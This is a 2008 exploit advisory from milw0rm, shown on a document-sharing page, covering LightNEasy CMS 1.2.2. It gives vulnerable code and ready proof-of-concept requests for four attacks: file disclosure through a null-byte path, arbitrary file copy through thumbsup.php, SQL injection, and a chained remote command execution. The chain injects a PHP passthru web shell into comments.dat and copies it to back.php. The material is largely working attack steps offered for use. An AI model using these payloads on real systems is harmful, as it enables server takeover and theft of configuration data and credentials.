LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities by h3m4n

VIEWS: 33 PAGES: 3

									                      LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities                         Page 1/3
   1    # Author:          __GiReX__
   2    # mySite:          girex.altervista.org
   3    # Date:            14/04/08
   4
   5    # CMS:             LightNEasy SQLite / no database <= 1.2.2
   6    # Site:            lightneasy.org
   7
   8    # Advisory:        Multiple Remote Vulnerabilities
   9
   10   # Need:           magic_quotes_gpc = Off
   11                     magic_quotes_gpc = On / Off for SQL Injections
   12
   13   ######################################################################################
   14
   15   # Bug 1:          Remote File Disclosure
   16   # Affected:       SQLite / no database
   17
   18   # Get the config.php into HTML (like a comment)
   19   # Note config.php not exists in SQLite version
   20
   21   # PoC:            [host]/[path]/LightNEasy.php?page=config.php%00
   22
   23   ######################################################################################
   24
   25   # Bug 2:          Arbitrary file copy and rename / Thumsup v1.12
   26   # Affected:       SQLite / no database
   27
   28   # This vuln is present in this extern script by Gerd Tentler that is included by default
   29   # in LightNEasy
   30
   31   # Vuln Code:      LightNEasy/thumbsup.php
   32
   33   34.    if(isset($_REQUEST[’image’])) $image = $_REQUEST[’image’];
   34   37.    if(isset($_REQUEST[’cache_dir’])) $cache_dir = $_REQUEST[’cache_dir’];
   35
   36   407.   if($image) {
   37            if($fp = @fopen($image, ’rb’)) {      <==
   38              $size = filesize($image);           <==   Unfortunally filesize does not accept remote files
   39              $data = fread($fp, $size);          <==
   40             fclose($fp);
   41
   42              $original = "$cache_dir/img_" . md5($image . $size);   <==
   43            }
   44              else $error = ’Could not open’;
   45   414.   }
   46
   47   451.   if(!file_exists($original)) {
   48                if($fp = @fopen($original, ’wb’)) {          <==
   49                  fwrite($fp, $data, strlen($data));         <==
   50                  fclose($fp);
   51   455.      }
   52

girex                                                                                                             04/15/2008
                      LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities                             Page 2/3
   53   # Note config.php not exists in SQLite version
   54
   55   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00
   56
   57   # And then get file disclosure with:
   58
   59   # PoC:            [host]/[path]/LightNEasy/config.txt
   60
   61   ######################################################################################
   62
   63   # Bug 3:          Getting a Remote Command Execution
   64   # Affected:       SQLite / no database
   65
   66   # First of all inject PHP Code into comments.dat from $_POST[’newsid’] that is not sanizated
   67
   68   # Vuln code:      LightNEasy/runtime.php
   69
   70   32.      if($_POST[’submit’]=="sendcomment") {
   71   ...
   72   42.      if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
   73   43.         fwrite($fp,$_POST[’newsid’]."|".encode($_POST[’commentname’])."|".    <==
   74   44.         encode($_POST[’commentemail’])."|".time()."|".encode(stripslashes($_POST[’commentmessage’]))."||");
   75
   76
   77   # PoC:    If admin has been created some news and page news exists (it can has a different name)
   78
   79            POST [host]/[path]/LightNEasy.php?page=news
   80            Content−Type: application/x−www−form−urlencoded
   81
   82            commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
   83            &submit=sendcomment&newsid=<?php passthru($_GET[’cmd’]); ?>/*
   84
   85
   86   # Then create a file back.php with the trick of Bug 2
   87
   88   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00
   89
   90   # Finally send remote commands to back.php
   91
   92   # PoC:            [host]/[path]/back.php?cmd=ls
   93
   94   ######################################################################################
   95
   96   # Bug 4:          Multiple Remote SQL Injections
   97   # Affected:       SQLite
   98
   99   # Works with magic_quotes_gpc = On / Off
  100
  101
  102   # Vuln Code:      /LightNEasy/lightneasy.php
  103
  104   237.      if(isset($_GET[’dlid’])) {
girex                                                                                                                 04/15/2008
                   LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities           Page 3/3
  105              $result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET[’dlid’]);
  106
  107
  108   # PoC:          [host]/[path]/index.php?dlid=−1 OR 1
  109
  110   # You can find others more SQL Injections by yourself
  111
  112   ######################################################################################
  113
  114   # milw0rm.com [2008−04−15]




girex                                                                                            04/15/2008

								
To top